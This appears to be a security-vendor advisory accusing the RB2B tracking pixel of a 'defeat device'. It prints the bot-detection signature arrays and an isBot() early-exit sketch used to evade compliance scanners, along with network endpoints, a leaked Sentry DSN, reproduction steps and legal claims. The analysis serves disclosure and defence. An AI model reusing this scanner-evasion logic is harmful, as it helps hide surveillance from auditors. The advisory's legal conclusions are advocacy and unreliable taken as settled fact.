BTIBTI-2025-0001
CRITICALBTI-C01ACTIVE
9.2BTSS

RB2B

RB2B Defeat Device - Bot Detection and Exfiltration Reversal (Greyout)

Parent Company: Retention.com

Discovered
2025-11-09
Est. Deployments
1,500+
MITRE Technique
T1497
Trend
increasing

Summary

RB2B's JavaScript contains defeat device logic that detects compliance scanners, security tools, and automated browsers, then disables tracking functionality to appear compliant during audits while maintaining full surveillance for real users.

BTSS Score Breakdown

Exploitability
3.8/ 4
Data Sensitivity
2/ 3
Prevalence
1.8/ 2
Detection Difficulty
1/ 1

Technical Details

## How the Defeat Device Works RB2B's obfuscated script contains two bot detection arrays totaling 50+ signatures for automation tools, compliance scanners, and security frameworks. When any of these are detected via user-agent string or WebDriver API presence, the script either exits early or disables tracking functionality. This means: - Compliance auditors using Playwright/Puppeteer see "no tracking" - Security teams using automated scanners see "compliant behavior" - Real users get full surveillance including person-level de-anonymization This is identical to Volkswagen's defeat device strategy: detect the test environment, behave differently during testing than in production. ## Greyout Countermeasure (Keep vs Nuke) We reverse-engineered the payload to separate what GTM needs from what RB2B monetizes. The browser shim (Greyout) allows only the minimum viable fields: - account: routing - rb2b_md5, li_md5: identity hashes - guid: user deduplication - session_id: session tracking Everything else is stripped at the edge: - url, title, last_referrer: removed to kill intent/attribution - fbp, fbc, hs_hubspotutk: removed to break cross-site correlation - geo: precision removed, country-only preserved Result: identification still works for the site owner, but RB2B loses page-level intent, referrer, and cross-ecosystem linkage data. ## Dynamic Code Execution Architecture Deobfuscation of RB2B's pixel.js (528,566 characters) reveals the defeat device is implemented via dynamic code execution, making static analysis ineffective: | Pattern | Purpose | |---------|---------| | `new Function()` | Dynamic code execution - loads defeat device logic at runtime | | `document.cookie` | Cookie harvesting for cross-site correlation | | `navigator.userAgent` | Browser fingerprinting for bot detection | | `.innerHTML=` | DOM injection vector for persistent tracking elements | | `localStorage` | Persistent storage for tracking state across sessions | | `fetch()` | Network exfiltration to domain front network | The `new Function()` pattern is critical - bot detection arrays are not statically embedded but loaded dynamically from servers. This allows: - Server-side updates without client script changes - Different code paths for different environments - Evasion of static analysis tools ## Third-Party Infrastructure (rb2b.com) RB2B's own website reveals additional tracking infrastructure: **Wix Platform Integration:** - static.wixstatic.com, video.wixstatic.com - www.wixapis.com, dev.wix.com - UUID-based file storage: `{UUID}.USRFILES.COM` **Poptin Integration (Israeli popup vendor):** - cdn.popt.in, fonts.popt.in, display.popt.in, app.popt.in - www.poptin.co.il, www.poptin.com - Feature flags: POPTIN_BROWSE_ABANDONMENT_PRODUCTS, POPTIN_SHOPIFY_CART - Poptin collects data on RB2B's own visitors (surveillance vendors surveilling each other) **CloudFront CDN:** - d362h7pxdteoyk.cloudfront.net **ChiliPiper Integration (B2B meeting scheduler):** - api.{cluster}.chilipiper.com - {tenant}.chilipiper.com - 77,768 char script with embedded Sentry SDK - Full error telemetry: captureException, captureMessage - User identification: setUser, session tracking - Cluster-based routing via localStorage (CHILI_PIPER_CLUSTER) - **Sentry Tunnel**: tracking.chilipiper.io/sentry/tunnel (evasion) - Leaked DSN: 5acd77a479f023b04380ea323d3b0764@o94797.ingest.us.sentry.io - Another surveillance vendor surveilling RB2B's visitors **Webflow CDN (rb2b.com):** - cdn.prod.website-files.com - Serves tracking assets for rb2b.com itself ## PRE-CONSENT DATA EXFILTRATION BLACKOUT scan of rb2b.com (JOB-1764653613912-pgrn) detected: | Phase | Endpoint | Data | |-------|----------|------| | **PRE-CONSENT** | cdn.prod.website-files.com | hash, phone | RB2B exfiltrates **hashed phone numbers** BEFORE any consent interaction. This exposes TCPA liability for any site deploying their pixel - the hash is still derived from PII and transmitted without consent.

Code Evidence

javascriptRB2B obfuscated loader

Bot Detection Array #1 - Automation Tool Signatures

const BOT_DETECTION_1 = [
  "ahrefssiteaudit",
  "bingpreview",
  "crawler",
  "hubspot",
  "mj12bot",
  "petalbot",
  "vercelbot",
  "mediapartners-google",
  "instagram",
  "webdriver",
  "geckodriver",
  "beautifulsoup",
  "insomnia"
];
javascriptRB2B obfuscated loader

Bot Detection Array #2 - Extended Signatures (50+ patterns)

const BOT_DETECTION_2 = [
  "headlesschrome",
  "cypress",
  "phantomjs",
  "selenium",
  "chromedriver",
  "scrapy",
  "python-requests",
  "postman",
  "webdriver",
  "puppeteer",
  "playwright",
  // ... 40+ more patterns
];
javascriptRB2B obfuscated loader

isBot Check Implementation

// Simplified from obfuscated original
function isBot() {
  const ua = navigator.userAgent.toLowerCase();
  return BOT_SIGNATURES.some(sig => ua.includes(sig)) ||
         navigator.webdriver === true ||
         window._phantom ||
         window.callPhantom;
}

// Early exit if bot detected
if (isBot()) return;
javascriptRB2B pixel.js (deobfuscated)

Dynamic Code Execution - new Function()

// Enables runtime code generation - defeat device loaded dynamically
new Function(
  [399,219,7,261,246,471,22,247,438,648,154,963,536,522,951],
  ()=>n(4857)
)
// Numeric arrays are string table indices for obfuscation
javascriptRB2B pixel.js (deobfuscated)

JOSE/JWT Encryption Library - Encrypted Exfiltration

// Full JOSE library for encrypted payloads
CompactEncrypt, SignJWT, EncryptJWT, jwtVerify, jwtDecrypt

// Supported algorithms (military-grade encryption for tracking data)
AES-GCM, AES-KW, ECDH-ES, RSA-OAEP, PBKDF2, Ed25519

// Auth state machine
LoginState: SUCCESS, INITIAL, FAILURE, EMAIL_VERIFICATION_REQUIRED
TokenRole: NONE, VISITOR, MEMBER
javascriptRB2B pixel.js (deobfuscated)

Poptin Behavioral Tracking Flags

// Cart abandonment and e-commerce surveillance
POPTIN_BROWSE_ABANDONMENT_PRODUCTS
POPTIN_FETCH_INITIAL_SHOPIFY_CART_FOR_FILTER
POPTIN_FETCH_INITIAL_SHOPIFY_CART
POPTIN_SHOPIFY_RECENT_PRODUCT_ID

// Session and page tracking
POPTIN_PREVIOUS_VISITED_PAGES_WITH_TIMESTAMP
POPTIN_CUSTOM_NEW_VISITOR_SESSION

// Cross-platform data sharing
DATA-FACEBOOK-SEND-TO-MESSANGER-PLUGIN

Network Evidence

GEThttps://ddwl4m2hdecbv.cloudfront.net/b/{CUSTOMER_ID}

Primary loader - only executes if bot not detected

POSThttps://api.rb2b.com/identify
{"visitorId":"...", "email":"...", "company":"..."}

Person-level identification - blocked if bot detected

POSThttps://*.execute-api.us-west-2.amazonaws.com/b2b

API Gateway deanonymization endpoint (exfiltration surface; Greyout strips intent fields here)

Attack Parallel: Volkswagen Dieselgate

VW's ECU software detected EPA dyno test conditions (steering wheel angle, ambient pressure, wheel speed sensors) and switched to a "compliant" emissions mode. Outside testing, the vehicles exceeded emissions limits by up to 40x. RB2B's script detects compliance testing conditions (automation tools, headless browsers, known scanner user-agents) and disables tracking. Outside testing, full surveillance operates including person-level de-anonymization. Both are "defeat devices" - software that detects regulatory oversight and alters behavior to appear compliant.

Reference

Framework Mappings

MITRE ATT&CK
T1497
Virtualization/Sandbox Evasion
Tactic: Defense Evasion
PCI DSS 4.0
11.6.1
Change detection mechanisms
OWASP Client-Side
CS4: Lack of Script Integrity

Legal Touchpoints

FTC Act 15 U.S.C. § 45(n)United States

Defeat devices constitute unfair trade practices. The deceptive nature of appearing compliant to auditors while surveilling users meets the FTC's unfairness standard: substantial injury, not outweighed by benefits, not reasonably avoidable by consumers.

FTC Act Section 5United States

Deceptive acts or practices in commerce. Representing compliance while actively evading compliance tools is textbook deception.

State UDAP LawsAll US States

Unfair and Deceptive Acts and Practices statutes in all 50 states prohibit deceptive business practices. Defeat devices meet this standard.

GDPR Art. 5(1)(a)European Union

Processing must be lawful, fair, and transparent. Defeat devices are the opposite of transparent - they are designed to hide true behavior from oversight.

TCPA 47 U.S.C. § 227United States

Pre-consent exfiltration of hashed phone numbers constitutes collection of telephone subscriber information. Even hashed data is derived from PII and transmitted without prior express consent. Sites deploying RB2B inherit TCPA liability for this pre-consent phone data collection.

Prevalence

1,500+
Estimated Deployments
Market Segments
B2B SaaSE-commerceProfessional ServicesTechnology
Notable Deployments
  • RB2B's own website (rb2b.com)
  • Numerous B2B SaaS companies
  • Via white-label through Clay, Warmly

Reproduction Steps

## Reproduction Steps

1. **Visit rb2b.com** in a normal browser
   - Observe RB2B tracking loads and executes
   - Network requests to api.rb2b.com visible

2. **Visit rb2b.com** with Playwright/Puppeteer
   - Set `--headless` or let webdriver be detected
   - Observe RB2B script loads but tracking does NOT execute
   - No requests to api.rb2b.com

3. **Visit rb2b.com** with spoofed user-agent containing "selenium"
   - Observe same behavior - tracking disabled

4. **Deobfuscate the script** using Babel AST transformation
   - Extract bot detection arrays
   - Locate isBot() function and early exit logic

Remediation

immediate

Immediately remove RB2B script from all properties

Effort: trivial
short term

Audit other vendors for similar defeat device behavior

Effort: moderate
long term

Implement vendor contract clause prohibiting defeat devices

Effort: moderate
short term

Report to FTC if operating in regulated industry

Effort: significant
immediate

If GTM demands vendor retention, deploy Greyout to strip intent/referrer/pixel data while allowing IDs

Effort: moderate

References

legalVolkswagen Emissions Scandal - Wikipedia
regulatoryFTC Act Section 5 - Unfair or Deceptive Acts
researchMITRE ATT&CK T1497 - Virtualization/Sandbox Evasion
Created: 2025-11-25Updated: 2025-12-01Version: 2
#defeat-device#bot-detection#evasion#critical#rb2b